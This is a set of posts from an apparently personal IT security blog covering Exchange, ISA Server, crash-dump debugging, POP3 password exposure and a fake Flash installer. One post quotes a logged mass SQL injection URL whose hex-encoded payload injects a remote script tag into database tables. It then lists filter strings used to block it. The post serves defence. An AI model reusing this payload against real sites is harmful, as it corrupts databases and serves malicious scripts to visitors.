Just another security blog?

Exchange 2010 -- 17.11.2009

noreply@blogger.com (Just Another Security Blog?) — Tue, 17 Nov 2009 23:26:00 +0000

Prezentacija s predavanja o Exchange 2010 z dne 17.11.2009 je na voljo tule:

Exchange.ppt

Microsoft Exchange postavitev:
http://technet.microsoft.com/en-us/library/bb687782.aspx

Konfiguracija storage:
http://technet.microsoft.com/en-us/library/cc500980.aspx

Windows 2008 R2 Session -- 20.10.2009

noreply@blogger.com (Just Another Security Blog?) — Tue, 20 Oct 2009 19:25:00 +0000

Resources and scripts from presentation.

PowerPoint presentation.

Question from today:

Is it possible to have Windows XP boot from VHD.

The answer is no (well, at least it is not supportable). This is only supported on Windows 7 and Windows 2008 R2

More information on this can be found here.

My Bleeding edge presenation

noreply@blogger.com (Just Another Security Blog?) — Sun, 18 Oct 2009 09:06:00 +0000

Below you can download my presentation from this year's Bleeding edge conference.

Inside you can find link to e.g. Ste-by-Step guide to setting up NAP etc.

Bleeding Edge presentation

Creating DynamicDistributionGroup with -RecipientFilter

noreply@blogger.com (Just Another Security Blog?) — Mon, 05 Oct 2009 20:45:00 +0000

As any Exchange 2007 administrator knows, you get best features by using PowerShell.

In old version of Exchange (e.g. Exchange 2003), you could create dynamic distribution group where the members of the group would be users from specific Exchange server or Exchange Mailbox Store. This was very useful especially during migration since it was very easy to notify all the users in the store that their mailboxes will be moved over the night. One would only have to create a dynamic group with appropriate filter.

If you want to create dynamic group on Exchange 2007 you have very limited filters available in GUI.

To get the same results as we did on Exchange 2003 we need to use the PowerShell. The command we need to use is:

New-DynamicDistributionGroup –Name "All Users on Server Exchange" –Alias "AllonExchange" –RecipientFilter {(ServerName –eq "Exchange")}

This will actually create new dynamic distribution group named "All Users on Server Exchange" and users will be filtered by "ServerName".

If you open the dynamic group we just created in GUI you can notice it has an additional tab where you can check the filter that we created in PowerShell.

There are a lot of properties we can filter by. ServerName is just one of them. To get complete list of the properties check the Filterable Properties for the -RecipientFilter Parameter in Exchange 2007 SP1 and SP2.

Windows Server 2008 R2 -- 29.9.2009

noreply@blogger.com (Just Another Security Blog?) — Wed, 30 Sep 2009 05:24:00 +0000

www.krneki.net/blog/extras/PS.txt
www.krneki.net/blog/extras/Windows%20Server%202008%20R2.ppt

BitLocker Active Directory Recovery Password Viewer on Windows Server 2008 R2

noreply@blogger.com (Just Another Security Blog?) — Sun, 23 Aug 2009 19:51:00 +0000

When you try to install BitLocker Active Directory Recovery Password Viewer tool on Windows Server 2008 R2 you will receive an error saying »This update is not applicable to your computer«.

You can find BitLocker Password Recovery tool on Windows Server 2008 R2 under Features. You can install the tool by opening Server Manager and under »Add Features« look for »Remote Server Administration Tools« »Feature Administration Tools«. Here select »BitLocker Diver Encryption Administration Utilities« and follow the wizard.

Once install process completes you can open Active Directory Users and Computers and right click on domain level. You should now see »Find BitLocker Recovery Password…«

Note: If Active Directory Users and Computers MMC was running during the installation process, you will have to reopen the MMC console to see the new option.

Troubleshooting 0xc0040014 FWX_E_FWE_SPOOFING_PACKET_DROPPED error

noreply@blogger.com (Just Another Security Blog?) — Tue, 18 Aug 2009 20:18:00 +0000

When you run into 0xc0040014 FWX_E_FWE_SPOOFING_PACKET_DROPPED error on ISA it means that IP traffic is being forwarded to the network interface that is not expecting traffic from that IP address range. If you are using only physical network cards this should be easy to troubleshoot because ISA will log the interface name that is receiving network packets.

If you are using Enterprise networks on ISA Server Enterprise Edition and you run into spoofing problem on one of enterprise networks ISA will list name enterprise network which may not be directly linked to physical address.

In our case we have two possible paths (routes) that packet could take to reach the ISA server.

To figure out which router was forwarding the packets to the wrong interface I started Wireshark and made a network capture. For clarity I filtered the traffic by IP addresses of remote site that we wire connecting.

In network capture we can see MAC address of the router that is forwarding the network packets to the wrong network card (network card that is not expecting those IP packets). We can now use arp -a command on server to find out which IP address the MAC address belongs to and with this we tracked down the router.

Now that we knew which device was forwarding the packets we were able to fix the routes to ISA server and solve the problem.

Bleeding Edge 2009!

noreply@blogger.com (Just Another Security Blog?) — Tue, 14 Jul 2009 16:41:00 +0000

Bleeding Edge Conference is back!

It will happen on October 1st 2009. It will be held in Congress center Olimia – Podčetrtek.

This year, we are adding IT Pro track!

Stay tuned for more information!

Official Bleeding Edge site.

Bleeding Edge on Facebook

Geting infected through Facebook -- Part 1

noreply@blogger.com (Just Another Security Blog?) — Sun, 31 May 2009 15:22:00 +0000

Recently I saw an "interesting" URL link on my Facebook. Knowing the person, and I decided to check it out.

Somehow I decided to visit this URL site from one of my virtual computers that I can easily discard. Once on the site and before I got redirected I was able to see this

Since this didn't help much I wanted to check out the source code.

While this was not very useful (yet), I did notice the redirect URL in the status bar of my browser.

This redirection actually took me to different URL addresses at different times of testing.

Once the site loads, it notifies the user that it requires Adobe Flash Player 10.37. Checking out Adobe site the latest version they are offering is 10.0.22.87.

(joke mode = on) This new version (10.37) must be coming from China ;-). They always have the latest versions ;-) (joke mode = off)

I guess this is a good oppurtunity again to stress how important it is that you get your software from trusted and reliable source and not to blindly trust everyone.

There are few links with comments on this site and all of them lead to the same thing -- setup.exe file.

Setup.exe file in this case in 15 KB in size compared to Adobe Flash Player offered by Adobe which is 15 MB in size.

I decided to go forward with this and download and run the setup.exe and see what happens. I will be writing about this in part 2.

NT Conference 2009 materials

noreply@blogger.com (Just Another Security Blog?) — Fri, 29 May 2009 11:25:00 +0000

I posted my materials from NT Conference 2009 on my website. You can find power points and some other materials here: http://www.krneki.net/NTK09/

Let me know if you have any questions on the subject.

Question from EBS training

noreply@blogger.com (Just Another Security Blog?) — Mon, 10 Nov 2008 11:11:00 +0000

There was an interesting question on EBS training about vitalizing EBS servers and support for such configuration.

The answer is yes. You can run you EBS environment virtualized and it is supported.

Here is also question and answer from Microsoft website…

Does EBS 2008 licensing allow for virtualization? (For example, Windows Server 2008 Standard includes Hyper-V with a license to run one server operating system in Hyper-V.)

For EBS 2008 Standard Edition: You can run one instance of each of the management server software, the security server software, and the messaging server software in a physical or virtual operating system environment (OSE) on up to 3 servers at any one time.
For EBS 2008 Premium Edition: You can run one instance of each of the management server software, the security server software, the messaging server software, and “premium server” software in a physical or virtual OSE on up to 5 servers at any one time. For the premium server software,

You can run an instance of Windows Server 2008 Standard in a physical or virtual OSE; and if you run a virtual OSE, you can run an additional instance of Windows Server 2008 in a physical OSE in order to run hardware virtualization software or provide hardware virtualization services or run software to manage and service operating system environments on the licensed server.

You can run any number of instances of SQL in one physical or virtual machine, and it must be joined to the EBS domain.

You can even find a guide on Microsoft website on how to set up the virtual environment (document is currently not up-to-date and is based on RC0; still it should give you a general idea).

Essential Business Server

noreply@blogger.com (Just Another Security Blog?) — Wed, 05 Nov 2008 20:19:00 +0000

I published materials for "Essential Business Server" partner training meeting held at Microsoft Slovenija today.

You can find all materials here "http://www.krneki.net/EBS/"

SQL Injection/XSS attacks and URLScan 3.0

noreply@blogger.com (Just Another Security Blog?) — Thu, 09 Oct 2008 06:15:00 +0000

In my previous post I wrote about protecting web sites from SQL Injections, XSS and other URL manipulation by using ISA Server. The question for this post is what can users and system administrators without ISA do to protect their (Microsoft) web servers. URLScan 3.0 is a free tool from Microsoft and answer to the above question. URLScan was recently release and will run on IIS 5.1 and newer including IIS 7 running on Windows 2008. It works as ISAPI filter and will check any URL passed to the server. If the URL matches any filter criteria URLScan ISAPI filter will block such request.

After downloading URL Scan and following simple installation instructions we can start configuring our own filters and settings.

First, let’s create an error file that will show an error when an illegal URL is passed to the server. We can create this file inside the website working folder (default "c:\inetpub\wwwroot"). I named my error file "err.htm".

In this file we can enter any message to users passing malformed URL that we want. Message can be HTML formatted or if you want you can even create aspx file that will display visitors IP address or redirect bad request to some other address (e.g. default page). For this demonstration I used simple text message stating "Illegal URL detected…" (picture below)

Now we can open and edit urlscan.ini file by default located in "\Windows\System32\inetsrv\urlscan\".

First let’s edit

RejectResponseURL=/err.htm

"err.htm" is name of the file that we created above. Any rejected URL request will get redirected to this file (picture below)

Next lets scroll down in the urlscan.ini fille to [DenyURLSequences] segment where we can add additional filters. This could include:

"Char("
"exec(@s)"
"..."

And others that I mentioned on my previous post or the ones that you might discovered on your own.

Your urlscan.ini file might now look something like this (picture below)

Any user passing illegal URL to our web server will get an error like this (picture below)

Recommendation: Check out other options in urlscan.ini file that might be useful to you. E.g. if you want to limit URL length you can also edit [RequestLimits] segment

MaxAllowedContentLength=
MaxUrl=
MaxQueryString=

with values that work in your environment. This is actually something that you will have to test in your environment first.

Conclusion: Personally, I prefer to use ISA Server for such filtering when I can. It stops these kinds of attacks at the network edge before the malformed URL even "touches" the web server.

Note: This was never meant as permanent cure for SQL Injection or XSS attacks. This is just a precaution and to buy some time to check and fix any potential vulnerabilities in the web applications.

SQL Injection/XSS attacks and ISA HTTP filter

noreply@blogger.com (Just Another Security Blog?) — Sun, 05 Oct 2008 17:58:00 +0000

In my previous post I wrote about blocking China because a lot of SQL Injection/XSS attacks against my customer servers originated from there. In this post I will write about some other steps we took to protect the servers.

From log files we were able to determine that computers there are part of zombie network were passing following URL against the web servers:

http://www.[domain].com/Default.aspx?id=223&lang=2;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861 72283430303029204445434C415245205461626C655F437572736F7220435552534F5 220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D20737973 6F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D6 22E696420616E6420612E78747970653D27752720616E642028622E78747970653D39 39206F7220622E78747970653D3335206F7220622E78747970653D323331206F72206 22E78747970653D31363729204F50454E205461626C655F437572736F722046455443 48204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4 043205748494C4528404046455443485F5354415455533D302920424547494E206578 65632827757064617465205B272B40542B275D20736574205B272B40432B275D3D272 7223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F77777733
2E73733131716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212
D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B65
20272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F7
77777332E73733131716E2E636E2F63737273732F772E6A73223E3C2F736372697074
3E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F43757
2736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572
736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);

After analyzing this URL we determined few optional strings to block. Here are some of them:

"declare @s char("
"exec(@s)"
"@s=cast("
"char("

Not seen in above encoded URL is also string "script src=http://" which we also decided to block

I decided to block above strings on ISA Server that is in this case front end firewall. I opened ISA Server Management console and right clicked on the publishing rule for the server that was getting attacked. Here I selected "Configure HTTP" (picture below).

Here we select "Signatures" tab and select the "Add" option (picture below)

Here we can now enter strings that we identified earlier and we want to block when they appear in the URL (picture below)

After clicking OK we can preview entered strings (picture below)

We also added another filter under "General" tab. URL in our example is very long (over 1300 characters) and we decided to limit how long the URLs passed to our web servers can be. Instead of default 10240 bytes we decreased the value to 512 bytes which will more than accommodate our needs (picture below). URL requests longer than 512 bytes will be blocked.

When URL matching any entered filters ISA will block the request before it reaches the potentially vulnerable web server (picture below).

Note: This was never meant as permanent cure for SQL Injection or XSS attacks. We did this just as a precaution and to buy some time to check the web applications for any vulnerabilities!

Bleeding Edge materials...

noreply@blogger.com (Just Another Security Blog?) — Fri, 03 Oct 2008 17:26:00 +0000

My materials (PPTs etc) from Bleeding Edge are now available for download.

Importing ISA Server Computer Set from Standard Edition to Enterprise Edition

noreply@blogger.com (Just Another Security Blog?) — Mon, 22 Sep 2008 18:15:00 +0000

Note: you should backup ISA Server configuration before trying out following workarounds (just in case) ;-)

My customers are no exception; they too are getting attacked¹ from IP addresses belonging to China address space. For some of them we simply decided to block all traffic originating in China. For customers using ISA server as a firewall, I decided to use "Country by Country ISA Computer Sets" prepared by Thor (thank you Thor).

The scripts that we could download were prepared for ISA Server 2004 or ISA Server 2006 Standard Edition and they could not be imported to ISA Server Enterprise Edition. If you try to import it to ISA Server Enterprise Edition you would get the following error:

Error: 0xc00403a4
Enterprise Edition settings cannot be imported into Standard Edition, and Standard Edition settings cannot be imported into Enterprise Edition.
The error occurred on object 'ComputerSets' of class 'Computer Sets' in the scope of array 'Firewall'.

I really didn't want to copy and paste or manually recreate the computer set. After playing around with the XML file containing computer set I figured out that if you change fpc4:Edition line from

to

you can now import computer set to ISA Server 2006 Enterprise Edition even if it was exported from ISA Server 2006 Standard Edition. You should see the above line near the top of the XML file.

Here are also screenshots of the XML file (before and after):

Standard Edition

Enterprise Edition

1. I will write more about the attacks themselves in my next post...

Bleeding Edge Conference...

noreply@blogger.com (Just Another Security Blog?) — Thu, 11 Sep 2008 18:58:00 +0000

I am getting ready for Bleeding Edge conference. The conference will be held on October 1st in Portorož – Slovenia.

It is one day event with two tracks. Speakers will be Dejan Sarka, Dušan Zupančič, Matevž Gačnik, Miha Markič, Miha Valenčič and myself. Hm – it looks like we will have "Miha track…" :-)

I am really looking forward to this event. It should be very educational! I hope to see you there!

Fine grained policies and Password Policy Manager (PPM)

noreply@blogger.com (Just Another Security Blog?) — Sat, 06 Sep 2008 19:30:00 +0000

Windows 2008 AD DS (Active Directory Domain Services) allow administrators to set different password policies to different users or groups. In practice this could mean that administrator can set a password policy of e.g. minimum 5 characters ¹ for a password that must be changed every 60 days for ordinary users wile a group of administrators must have a password with at least e.g. 14 characters that they need to change every 30 days.

To achieve this, administrator must create different Password Settings objects (PSO) and apply them directly to user objects or better to group. Any member of the group will now have password policy that PSO linked to the group defines.

My friend Miha Jakovac and I wrote (well Miha did most of the writing ;-) ) a free tool called Password Policy Manager or PPM that allows administrators to use GUI tools for creating and applying PSO to users or groups.

You can also use the tool to search for any existing PSOs, edit existing PSOs, delete existing PSOs and view applied PSOs to users or groups.

You can download and use PPM for free.

Let Miha or me know what you think about the tool ...

I don’t recommend using password policy that allows users such short passwords

Following are some screenshots of the tool...

Creating new PSO

Applying PSO to user

Checking for any existing PSOs applied to the object

Result of the check will show PSO that users is a member of. Here you can also remove user (or group) from applied PSO

Searching

Hint 1: You can use keywords...
Hint 2: You could search for specific user or group and apply new PSO to it...

Result of the search

With return list of PSOs you can view details of the PSOs, edit them, delete them etc.

Viewing PSO details

You can view details of PSO such as password length, password history and other settings. You can also remove any user from PSO that might be linked to it. If you wish, you could export the settings to LDF formatted file.

Slow mail relay server performance

noreply@blogger.com (Just Another Security Blog?) — Sat, 30 Aug 2008 19:37:00 +0000

Recently I was troubleshooting slow performance of customer's server. After going through regular check such as amount or RAM, processor power using task manager that didn't reveal anything useful I run Performance Monitor (perfmon).

By default perfmon shows three counters (on Windows server 2oo3) and one of them is "Average disk queue length".

Looking at the picture below, you can see (highlighted and circled in the green) that average disk queue length was over 3 almost all of the time.

Average disk queue length indicates the average number of both read and write requests that were queued for the selected disk during the sample interval. In other words, on this particular server, there are more requests for reading and writing operations that server can handle. Browsing through different recommendations, anything higher than 1 should be investigated as potential bottleneck and should be investigated.

At this point I was getting somewhere with this server. Since disk queue length was high I decided to check if this hard disk was badly defragged (picture below) and I was proven right.

To explain this a bit further. This is a dedicated mail relay server sitting in DMZ, constantly receiving e-mails (and a lot of spam) from the internet. This means it is constantly receiving small files, writing them to hard drive, forwarding them to internal mail servers and then deleting them from the hard disk. This amounts to a lot of reading and writing requests.

Investigating further I discovered that "badmail" folder hasn't been cleaned out in a very long time. It contained more then 100.000 (small) files.

Resolution:

Emptying badmail folder
Performing defrag on the hard drive -- numerous times
I created a batch job that runs several times a day cleaning out "badmail" folder
I created a batch job that is running defrag on the server every night

Since making these changes while server is still under a lot of stress it is performing much better then before.

POP3 and (password) security... (Part 2)

noreply@blogger.com (Just Another Security Blog?) — Mon, 12 Nov 2007 20:50:00 +0000

After writing "POP3 and (password) security", I received few e-mails asking me about potential consequences of someone knowing (learning) your e-mail passwords…

Well, it depends on the (e-mail) system. Most obvious consequence is that someone other than you can now read your e-mail. Every one of us now has to decide if that is bad and how bad.

<funny mode = "on">
Personally I wish someone would guess my password and read my e-mail in hopes of this person responding to some of them instead of me... ;-) ...
</funny>

Next thing we have to ask ourselves is, where else do we use this same username and password? At time where single-sign-on systems are more and more popular, one password is used to access your e-mail and other (corporate) systems that might be holding sensitive data.

Last but not least; and too often underestimated consequence. Some e-mail systems are configured (some of them by default) to allow relaying of any e-mail if clients successfully authenticate.

What is e-mail relaying?
In general, e-mail servers will only accept inbound e-mail messages where "Mail to:" ("rcpt to:") filed matches domain name that e-mail server is "responsible" for. In my case this would be anything ending with "@krneki.net". E-mail messages that have destination address anything other than "@krneki.net" should get rejected.

Knowing username and password would allow anyone to authenticate against e-mail server (SMTP service) and submit messages destined to any domain other such as "@gmail.com" making server accept and relay messages to other e-mail servers.

This is bad for few reasons:

It will consume all available resources (e.g. hard disk space)
It is very likely that your public IP address will end up on spam list (black list) preventing delivery of our legitimate e-mail messages to our partners and customers

Such attacks against e-mail servers are not uncommon and are popular enough to get mentioned on Wikipedia!

KERNEL_MODE_EXCEPTION_NOT_HANDLED (8e) in fw.sys

noreply@blogger.com (Just Another Security Blog?) — Wed, 07 Nov 2007 10:10:00 +0000

I received this dump files from our customer. Unfortunately there seem to be something wrong with dump file itself and I had a bit of trouble getting necessary information from it.

Computer in trouble:
Windows Server 2003 Kernel Version 3790 (Service Pack 2) MP (2 procs) Free x86 compatible
Product: Server, suite: TerminalServer SingleUserTS
Built by: 3790.srv03_sp2_rtm.070216-1710
Kernel base = 0x80800000 PsLoadedModuleList = 0x808af9c8
Debug session time: Wed Oct 31 11:46:37.968 2007 (GMT+1)
System Uptime: 0 days 0:01:33.781

Error reported by the computer:
KERNEL_MODE_EXCEPTION_NOT_HANDLED (8e)

!analyze –v returns following information
STACK_COMMAND: .bugcheck ; kb
FOLLOWUP_IP: fw+288aebf66b6aeb 0c8b or al,0x8b
FAULTING_SOURCE_CODE:
FOLLOWUP_NAME: MachineOwner
SYMBOL_NAME: fw+288aeb
MODULE_NAME: fw
IMAGE_NAME: fw.sys <-- It looks like fw.sys driver is causing problems
DEBUG_FLR_IMAGE_TIMESTAMP: 45214c7f
FAILURE_BUCKET_ID: 0x8E_fw+288aeb
BUCKET_ID: 0x8E_fw+288aeb
Followup: MachineOwner

STACK_TEXT: WARNING: Stack unwind information not available. Following frames may be wrong.808a3600 80839b02 00000000 0000000e 00000000 intelppm+0x2ca2
808a3604 00000000 0000000e 00000000 00000000 nt!KiIdleLoop+0xa

Let's take a look at registers
0: kd> r
eax=6029c494 ebx=ffdffee0 ecx=ffdffee0 edx=00000041 esi=ffdffec0 edi=867edd70
eip=f75d9ca2 esp=808a35e4 ebp=808a3600 iopl=0 nv up ei pl nz na po nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000206
intelppm+0x2ca2:f75d9ca2 01895104fbf4 add [ecx+0xf4fb0451],ecx ds:0023:f4db0331=????????

I am not sure if this is actual dump file problem or something else. Analysis it stating that fw.sys caused the problem, but in STACK_TEXT and in registers we can spot intelppm+0x2ca2 (intelppm.sys driver). intelppm.sys is Microsoft's Processor Device Driver... :-). OK. Let's say I am willing to give benefit of the doubt to WinDBG... :-)

Let's get some more information about fw.sys
0: kd> lm v m fw*
start end module name
f642e000 f69ceb20 fw (no symbols)
Loaded symbol image file: fw.sys
Image path: fw.sys
Image name: fw.sys
Timestamp: Mon Oct 02 19:29:35 2006 (45214C7F) <-- Coult be a bit old...
CheckSum: 005ACF67
ImageSize: 005A0B20
Translations: 0000.04b0 0000.04e0 0409.04b0 0409.04e0

And for intelppm.sys
0: kd> lm v m intel*
start end module name
f75d7000 f75e6000 intelppm T (no symbols)
Loaded symbol image file: intelppm.sys
Image path: intelppm.sys
Image name: intelppm.sys
Timestamp: unavailable (FFFFFFFE) <-- Hmmm... ?
CheckSum: missing <-- Hmmm; This shouldn't be missing
ImageSize: 0000F000
Translations: 0000.04b0 0000.04e0 0409.04b0 0409.04e0

fw.sys driver belongs to Check Point firewall.

I checked for any updates on Chek Point's website and knowledgebase where they do list few problems/solutions related to fw.sys and blue screens. Unfortunately Check Point seemed to have some connectivity problems between their front end and backend servers and I was not able to see any solutions... At this point I turned the case over to our in house Check Point experts... :-)

POP3 and (password) security

noreply@blogger.com (Just Another Security Blog?) — Mon, 05 Nov 2007 09:03:00 +0000

This is one of the most common "security misunderstanding" and I see it very often.

Whenever I am setting up e-mail servers and enabling web access, there is always a long and hard discussion on security. Customers are usually at this point worried about protection of their servers and usernames and passwords that will be sent over the internet. The obvious solution is SSL or even better TLS, which ensures that usernames, password and e-mail content are transferred from client computer to e-mail server and vice-versa in secure (encrypted) way.

After this is done, I often get strangest request possible. Enable and open POP3 and/or IMAP access to the server... and with this one simple sentence all security planning and considerations are gone

What I can't really understand is why is almost everyone thinking about security and SSL and encryption when it comes to web access and no one associates same security risks with POP3, IMAP, SMTP protocols and transfer of passwords?

Username and password are often sent in clear text (picture above)

Click image to enlarge

POP3 is not some magical protocol that would encrypt anything by itself. Yes, it is possible to set up POP3 in secure way (POP3S, IMAPS), but requires a bit more work compared to HTTPS and web access.

With web access you don't have to configure the clients, while with POP3 and IMAP you have to set the clients up to use secure protocols to send usernames and password in encrypted way. There is also an option which will protect (encrypt) the content of the e-mail while being downloaded from the server.

Content is also often transfered without protection... (picture above)
Click image to enlarge

None of this is done by default and most ISPs work in this manner! Even in closed (corporate) environments it can be a challenging, configuring couple of hundred if not thousands of clients. Most environments will have hard time doing the switch from insecure to secure protocols (e.g. POP3 to POP3S) because of extra configuration of the clients, possible downtime or even application incompatibilities. This is why it is extremely important to set up services and networks in a secure way in the first place.

There is another situation to consider and it is important one for roaming users. If you move from your network to a network where you are a guest, you might only be allowed access to some basic protocols such as HTTP, HTTPS, SMTP, and POP3, but not POP3S. POP3 by default runs on TCP port 110 while POP3S by default runs on TCP port 995 which might not be open on a gust network preventing roaming users from accessing their e-mails. This is more common problem then one might expect.

ISA Server 2006 Supportability Update

noreply@blogger.com (Just Another Security Blog?) — Wed, 31 Oct 2007 18:51:00 +0000

I do a lot of work with different firewalls including Microsoft ISA Server. As with any firewall, there is always something to troubleshoot. User can't access particular website, another user didn't receive his e-mail etc. These are all reasons why we need a good and fast way to filter and analyze firewall logs.

In ISA Server 2004 and 2006 there are few new features that come with updates and allow firewall administrators to save existing queries in XML file and reuse them at a later time.

Click image to enlarge

For me this is really a time saver. Now I don't have to waste time and write same filters over and over again (e.g. excluding specific traffic and including other). I can simply carry most common queries on my USB drive and import them whenever I need them.

On ISA Server 2004, you get these new features when you install Service Pack 3 (SP3) for ISA Server.

On ISA Server 2006, you can get these features by installing ISA Server 2006 Supportability Update that you can download manually or you can use Microsoft Update Service.

Click image to enlarge

More information on ISA Server 2006 Supportability Update package can be found here "Description of the Internet Security and Acceleration (ISA) Server 2006 Supportability Update package"

0x9C_IA32_GenuineIntel -- MACHINE_CHECK_EXCEPTION (9c)

noreply@blogger.com (Just Another Security Blog?) — Thu, 25 Oct 2007 21:32:00 +0000

New memory.dmp file, new challenge... :-)

After loading file to WinDBG and running a standard set of commands I am left with following relevant information.

BUSCONNERR - Bus and Interconnect Error BUS{LL}_{PP}_{RRRR}_{II}_{T}_err These errors match the format 0000 1PPT RRRR IILL

Concatenated Error Code: -------------------------- _VAL_UC_EN_ADDRV_PCC_BUSCONNERR_0

This error code can be reported back to the manufacturer. They may be able to provide additional information based upon this error. All questions regarding STOP 0x9C should be directed to the hardware manufacturer.

BUGCHECK_STR: 0x9C_IA32_GenuineIntel <---- Error 0x0000009C

DEFAULT_BUCKET_ID: DRIVER_FAULT

CURRENT_IRQL: 2

LAST_CONTROL_TRANSFER: from 80a84154 to 8087c480

STACK_TEXT:
808a0770 80a84154 0000009c 00000000 808a07a0 nt!KeBugCheckEx+0x1b
808a08a4 80a7b86f 80042000 00000000 00000000 hal!HalpMcaExceptionHandler+0x11e
808a08a4 f6932f36 80042000 00000000 00000000 hal!HalpMcaExceptionHandlerWrapper+0x77
808a3600 80839b02 00000000 0000000e 00000000 p3!AcpiC1Idle+0x12
808a3604 00000000 0000000e 00000000 00000000 nt!KiIdleLoop+0xa

STACK_COMMAND: kb

FOLLOWUP_IP:
p3!AcpiC1Idle+12
f6932f36 6a00 push 0x0

FAULTING_SOURCE_CODE:

SYMBOL_STACK_INDEX: 3

FOLLOWUP_NAME: MachineOwner

SYMBOL_NAME: p3!AcpiC1Idle+12

MODULE_NAME: p3

IMAGE_NAME: p3.sys <---- Here it looks like p3.sys driver caused the crash
DEBUG_FLR_IMAGE_TIMESTAMP: 45d6972c

FAILURE_BUCKET_ID: 0x9C_IA32_GenuineIntel_p3!AcpiC1Idle+12

BUCKET_ID: 0x9C_IA32_GenuineIntel_p3!AcpiC1Idle+12

Followup: MachineOwner---------

From stack it looks like p3.sys driver (Processor Device Driver) caused the crash of the server. One the other hand error 0x9C (0x0000009C) indicates hardware error.

Best article on the subject of 0x000000C (Understanding and troubleshooting the "Stop 0x0000009C" screen) states:

"The Pentium and Pentium Pro processors provide a mechanism to detect and to report hardware-related problems such as memory parity errors and cache errors. To signal a hardware error, the processor signals the detection of a machine check error by generating a machine check exception (Interrupt 18). Windows NT simply reports the fact that the error occurred and displays parameters that you can use to decode the exception. Contact your hardware vendor or processor manufacturer for information regarding the Machine Check Architecture or consult the Intel Pentium Pro Family Developer's Manual - Volume 3: Operating System Writer's Manual."

Above information is also displayed in dump file.

Full analysis of the dump file can be found here.

Possible resolutions:
Best recommendation suggested by above KB article is "contact your hardware vendor"

Problem caused by computer hardware

What you can do on your own?

Test your hardware (memory, processor, ...)
Check hardware connections
Think about recent hardware changes (incompatible components)
Think about recent configuration changes (e.g. enable or disable ACPI)
Update BIOS and other hardware (firmware)
Stress test your hardware (best done before going into production with the server)

Exchange Outlook Web Access (OWA) and red X

noreply@blogger.com (Just Another Security Blog?) — Wed, 24 Oct 2007 20:05:00 +0000

Click image to enlarge

This problem ocures due to changes in Windows Vista and Internet Explorer 7 where dynamic HTML Editing ActiveX control was removed from Internet Explorer.

To solve this problem you need to update your Exchange servers with "Update for Exchange 2003 (KB 911829)". Note that you have to install Exchange 2003 SP2 before you can install this update.

Related KB article: You receive an error message when you try to perform any editing tasks, or you must click to enable the compose frame in Outlook Web Access

Important: Remember to always update your front-end servers first!
If you update your back-end server first and there is change in OWA functionality, clients will most likely not be able to use OWA. In the past these errors presented themselves as “Loading” text in OWA that never finished loading.
If you update your front-end server first, server will know about changes in functionality and will serve clients with working OWA. Now you can take your time and update all your back-end servers when you find time ;-).